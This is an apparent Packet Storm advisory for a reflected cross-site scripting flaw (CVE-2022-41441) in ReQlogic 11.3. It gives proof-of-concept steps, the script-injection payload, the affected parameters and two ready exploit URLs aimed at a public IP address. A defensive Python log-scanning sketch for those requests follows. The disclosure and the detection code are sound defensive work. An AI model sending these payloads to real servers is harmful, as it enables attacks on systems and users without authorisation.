ReQlogic 11.3 Cross Site Scripting

ID: PACKETSTORM:171557
Published: 2023-03-28 00:00:00
Author: Okan Kurtulus
Source: packetstormsecurity.com
Tags: reqlogic, cross-site scripting, linux, cve 2022-41441, xss payload

EPSS: 0.002 (Low), percentile 52.9%

`# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)  
# Date: 9 October 2022  
# Exploit Author: Okan Kurtulus  
# Vendor Homepage: https://reqlogic.com  
# Version: 11.3  
# Tested on: Linux  
# CVE : 2022-41441  
  
# Proof of Concept:  
1- Install ReQlogic v11.3  
2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3  
3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.  
  
#XSS Payload:  
</script><script>alert(1)</script>  
  
#Affected Parameters  
POBatch  
WaitDuration  
  
#Final URLs  
http://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3  
http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>  
  
`
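A detection sketch for the requests described in the advisory, added here as an example and not part of the original advisory or the vendor's code: it scans access-log lines for requests to ProcessWait.aspx whose POBatch or WaitDuration value contains angle brackets after repeated URL decoding. The combined log format, the sample lines, the function names, and the assumption that WaitDuration is a whole number are all constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Parameters the advisory lists as affected (matched case-insensitively).
AFFECTED = {"pobatch", "waitduration"}
TARGET = re.compile(r'(?i)/ProcessWait\.aspx\?(\S+)')
MARKUP = re.compile(r'[<>]')  # characters needed to close or open a tag

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded markup is still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return sorted (parameter, reason) pairs for one access-log line."""
    match = TARGET.search(log_line)
    if not match:
        return []
    findings = set()
    for name, raw in parse_qsl(match.group(1), keep_blank_values=True):
        key = name.lower()
        if key not in AFFECTED:
            continue
        value = fully_decode(raw)
        if MARKUP.search(value):
            findings.add((name, "markup characters"))
        elif key == "waitduration" and not value.isdigit():
            # Assumption: WaitDuration is a whole number, as in the advisory's URL.
            findings.add((name, "non-numeric"))
    return sorted(findings)

# Constructed sample lines (combined log format, documentation IP addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Mar/2023:10:00:01 +0000] "GET /ProcessWait.aspx?POBatch=test&WaitDuration=3 HTTP/1.1" 200 512',
    '192.0.2.11 - - [28/Mar/2023:10:00:07 +0000] "GET /ProcessWait.aspx?POBatch=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&WaitDuration=3 HTTP/1.1" 200 540',
    '192.0.2.12 - - [28/Mar/2023:10:00:09 +0000] "GET /processwait.aspx?POBatch=test&WaitDuration=%253C%252Fscript%253E HTTP/1.1" 200 530',
    '192.0.2.13 - - [28/Mar/2023:10:00:12 +0000] "GET /Default.aspx?q=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, reason in suspicious_params(line):
            print(f"{reason}: {name} from {line.split()[0]}")
```

The third sample line is double-encoded, which is why the value is decoded until it stops changing before it is inspected.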
